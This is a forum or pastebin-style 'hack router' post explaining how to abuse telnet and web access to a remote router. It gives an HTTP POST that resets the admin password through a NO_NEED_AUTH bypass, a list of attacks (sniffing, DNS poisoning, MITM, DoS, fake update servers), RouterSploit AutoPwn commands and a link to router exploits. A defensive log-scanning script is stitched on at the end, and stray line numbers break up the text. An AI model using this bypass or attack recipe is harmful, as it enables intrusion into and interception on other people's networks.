hack router by lollhosh

May 25th, 2017
What to do with access to a remote router?
So let's assume there is access to a remote router and that it is possible to TELNET to it. The list of supported commands is:

list of supported commands :
? | exit | help
exec < iwconfig | iwpriv | iwgetid | iwspy | iwlist | iptables | ifconfig >
exec < route | netstat | arp | nslookup | vconfig | switch | ping >
exec < hostname | ps | killall | kill | top | free | reboot | lsmod >
exec < insmod | rmmod | cat | ls | head | tail | umount | mount | mkdir >
exec < rm | proc >
flash < default >
all <sample>
get <mib_name>
set <mib_name>[ <value>]
lan < status >
addr <ip-address> | ?
dhcp < ? | status | on | off >
client [start_ip <end_ip>]
slease < ? | status | clearall >
add <mac_addr> <ip_addr>
del [id]
iptv < ? | status | disable >
direct < 1 | 2 | 3 | 4 | 3+4 >
vlan < 1 | 2 | 3 | 4 | 3+4 >
voip < ? | status | disable | enable >
route < ? | status >
add <dest_addr|default> <gateway> [<metric>]
del <host addr|default>
nat < ? | status | clearall >
add <ip addr> <server> [bcast] [protocol <from port [to port] [d...
del <id>
sys < atsh | status | reload | delayed | commit | reboot | log | diag >
sys < ports >
mode < ? | status | gateway | wisp | ap >
update <0:disabled|1:enabled>
apply [bridge|wan]
manage
access
web <?|0:disabled|1:enabled> [port]
icmp <?|0:disabled|1:enabled>
telnet <?|0:disabled|1:enabled> [port]
ping <domain_name|ip-address>
nslookup <domain_name>
password <password>
service
webface < status | start | stop >
wan < status | none >
link < ? | status >
clone < ? | status | default | <mac-addr> | <ip-addr> >
dns < ? | status | auto >
manual [server-1 [server-2 [server-3]]]
static <?|[ip_addr <netmask> <gateway>]>
dhcp < ? | status | on | release | renew >
802.1x < ? | status | disable >
md5 <user name> <password>
chap <user name> <password>
mschap <user name> <password>
mschap2 <user name> <password>
peap-mschap2 <user name> <password>
upnp < ? | status | enable | disable >
sroute < ? | status | enable | disable | clearall >
add <ip-address> <subnet mask> <gateway>
del <id>
ppp < none | connect | disconnect | start | stop >
pppoe <service> <user> <password> <auth> <mppe> <mtu> [dynamic | s...
pptp <service> <user> <password> <auth> <mppe> <mtu> [dynamic | s...
l2tp <service> <user> <password> <auth> <mppe> <mtu> [dynamic | s...
reinit < ? | status | enable | disable >
wlan < status | ssid | rate | channel | clients | survey >
enable < ? | status | on | off >
band < ? | b | g | bg | n | gn | bgn >
auth < none >
open < wep64 | wep128 >
shared < wep64 | wep128 >
wpapsk < tkip | aes | tkipaes >
wpa2psk < tkip | aes | tkipaes >
wpapskwpa2psk < tkip | aes | tkipaes >

  78.  
  79. What can be done remotely with such commands? Is it possible to sniff traffic or to use the router as a VPN? What would you do? Thanks
  80.  
  81.  
  82. Next we gonna post a HTTP req
  83.  
Quote:
POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
Host: 192.168.1.2
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0

ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&
admin_name=admin&admin_password1=uhOHahEh


so you are resetting the admin pass with that
to enable or to know the telnet logins
so what after telnet is your question
so it's simple

#Sniffing
#DNS poisoning
#Network flooding
#Hack network cameras
#Hack DMV server
#Network DoS
#Corrupting the IP routing table
#Conducting a MITM attack
#Write ARP-trigger scripts which execute some functions in the network if one system calls a particular function
#Making a fake update server to fool devices
(example is if you know your victim PC has Firefox)
at the time of start, every time Firefox will check http://www.mozilla.org/en-US/plugincheck/
for knowing any updates; you just spoof a *.update.* wildcard update. We are filling the wildcard at front and end to ensure it will be detected whatever plugins the system has. As you have telnet access to the router you can do anything with the network.
another best thing is:
after telnet you can browse system files by just running pwd and ls -a
$ cd /var
but not more than the var directory
and you can do lots more but not serious damage.

if you want further access you can exploit it by the below steps

<3 Metasploit version for routers is > RouterSploit
Just get into the network
RouterSploit > use /payload/AutoPwn
RouterSploit(AutoPwn) > setg LHOST 192.168.1.1
RouterSploit (AutoPwn)> run
even there are lots of reverse shell exploits
So it fucks your router with all available exploits at rtrpwn server>

if you want to exploit using the scripts directly or manually
you can download exploits for routers from here
http://www.routerpwn.com/
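A defender-side addition, not part of the paste: a small Python scanner that flags the tools_admin.php request quoted above when it shows up in a router's web access log, so the password reset can be detected rather than just performed. The log line format and the sample lines are constructed assumptions for this example.

```python
import re
from urllib.parse import parse_qs

# Constructed sample access log (assumed format): "<client> <method> <path> <body>"
# Line 2 carries the body from the paste; the other lines are made up for contrast.
SAMPLE_LOG = """\
192.168.1.50 GET /index.php -
192.168.1.77 POST /tools_admin.php ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh
192.168.1.50 POST /tools_admin.php ACTION_POST=LOGIN&LOGIN_USER=admin&LOGIN_PASSWD=secret&login=+Log+In+
192.168.1.77 POST /tools_admin.php admin_name=admin&admin_password1=x
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (.*)$")


def parse_line(line):
    """Split one log line into client, method, path and the decoded POST fields."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, method, path, body = m.groups()
    fields = parse_qs(body, keep_blank_values=True) if body != "-" else {}
    return {"client": client, "method": method, "path": path, "fields": fields}


def classify(entry):
    """Return (severity, reason) for a suspicious admin-page POST, else None."""
    if entry is None or entry["method"] != "POST" or entry["path"] != "/tools_admin.php":
        return None
    f = entry["fields"]
    changes_password = "admin_password1" in f
    # The paste's trick: a login form field that tells the page to skip authentication,
    # sent together with a new admin password in the same request.
    if f.get("NO_NEED_AUTH") == ["1"] and changes_password:
        return ("high", "NO_NEED_AUTH=1 combined with admin_password1: unauthenticated admin password change")
    if changes_password and f.get("ACTION_POST") != ["LOGIN"]:
        return ("medium", "admin_password1 submitted outside the LOGIN action; verify the session was authenticated")
    if "NO_NEED_AUTH" in f:
        return ("medium", "client supplied NO_NEED_AUTH, a field the login form never sends on its own")
    return None


def scan(log_text):
    """Run classify() over every line and collect findings with line number and client."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        entry = parse_line(line)
        hit = classify(entry)
        if hit:
            findings.append({"line": n, "client": entry["client"], "severity": hit[0], "reason": hit[1]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']} {f['client']} [{f['severity']}] {f['reason']}")
```

A follow-up check on the device itself would be the `web`, `telnet` and `password` settings from the command list above, since the same request is what turns remote telnet access on.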